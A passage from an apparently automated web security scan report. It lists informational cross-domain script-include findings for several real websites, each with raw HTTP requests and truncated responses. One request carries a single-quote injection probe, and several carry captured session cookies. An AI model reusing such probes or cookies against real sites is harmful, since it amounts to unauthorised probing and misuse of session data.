Path:	/uds/solutions/localsearch/gmlocalsearch.js

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_dynamic_ads.js

Request

GET /uds/solutions/localsearch/gmlocalsearch.js HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 20:33:16 GMT
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 15:47:42 GMT
Expires: Wed, 02 Feb 2011 15:47:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

/**
* Copyright (c) 2008 Google Inc.
*
* You are free to copy and use this sample.
* License can be found here:
* http://code.google.com/apis/ajaxsearch/faq/#license
*/

(function () {
var afsMo
...[SNIP]...
</script>');
document.write('<script src="http://pagead2.googlesyndication.com/pagead/show_dynamic_ads.js" type="text/javascript"></script>
...[SNIP]...

18.597. http://www.gorp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gorp.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://btn.clickability.com/584254/button_2/button.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.trip.com/tripjs/lytebox.js

Request

GET / HTTP/1.1
Host: www.gorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:57:53 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSION_OO=D58D44404F14F4E6478556F96ECBD302; Path=/
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e32e8545525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/
Content-Length: 48602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Outdoor Travel Guides & Adventure Travel Information | GORP.com</title>
   <meta name="description" co
...[SNIP]...
<meta name="msvalidate.01" content="F4183A542954B39E862C81CCFCEDFA0E" />
<script language="javascript1.2" src="http://btn.clickability.com/584254/button_2/button.js"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://media.away.com/trip/css/lytebox.css" />
<script language="javascript" src="http://www.trip.com/tripjs/lytebox.js" type="text/javascript"></script>
...[SNIP]...

18.598. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotels.com
Path:	/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

Issue detail

The response dynamically includes the following scripts from other domains:

http://redcated/jaction/hotels_property_pages
http://www.google-analytics.com/ga.js

Request

Response

18.599. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:24 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.600. http://www.huffingtonpost.com/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1296569700&extra3
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1296569700&extra6

Request

GET /2008/11/16/paul-mccartney-hopes-to-r_n_144138.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 326639
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 14:33:30 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 01 Feb 2011 14:33:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1296569700&extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1296569700&extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

18.601. http://www.invisionpower.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /index.php?79b73' HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script>
...[SNIP]...

18.602. http://www.iphoneez.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iphoneez.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: www.iphoneez.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:30 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/html
Content-Length: 74543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Top iphone sites - Rankings - All
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.603. http://www.ispad.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ispad.info
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: www.ispad.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.604. http://www.kampyle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kampyle.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://seal.verisign.com/getseal?host_name=www.kampyle.com&size=S&use_flash=NO&use_transparent=NO&lang=en
https://server.iad.liveperson.net/hc/87252509/?cmd=mTagRepstate&site=87252509&buttonID=13&divID=lpButDivID-1295126343775&bt=3&c=1

Request

GET / HTTP/1.1
Host: www.kampyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d48a3e208103729dc32d5cdd8363eef; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>
<head>
<link href="/min/?f=%2Fstatic%2Fcss%2Fstyles.css.1296373190,%2Fstatic%2Fcss
...[SNIP]...
<td width="135" align="center" valign="top">
<script src="https://seal.verisign.com/getseal?host_name=www.kampyle.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/87252509/?cmd=mTagRepstate&site=87252509&buttonID=13&divID=lpButDivID-1295126343775&bt=3&c=1"></script>
...[SNIP]...

18.605. http://www.ligattsecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

Response

18.606. http://www.ligattsecurity.com/:nolink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/:nolink

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /:nolink HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 16:10:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Tue, 01 Feb 2011 16:10:59 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.607. http://www.ligattsecurity.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/about-us

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /about-us HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 16:11:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.608. http://www.ligattsecurity.com/commercials previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/commercials

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /commercials HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 16:12:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.609. http://www.ligattsecurity.com/font.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/font.swf

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /font.swf HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/wp-content/themes/elite-force/inc/cu3er/cu3er.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.1.10.1296574600

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Tue, 01 Feb 2011 15:33:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.610. http://www.ligattsecurity.com/ligatt-security/wp-admin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/ligatt-security/wp-admin

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /ligatt-security/wp-admin HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/solutions/boobytrap
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.3.10.1296574600

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Tue, 01 Feb 2011 15:33:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.611. http://www.ligattsecurity.com/solutions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/solutions

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /solutions HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.1.10.1296574600

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.612. http://www.ligattsecurity.com/solutions/am-i-hacker-proof previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/solutions/am-i-hacker-proof

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /solutions/am-i-hacker-proof HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/ligatt-security/wp-admin
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.5.10.1296574600

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
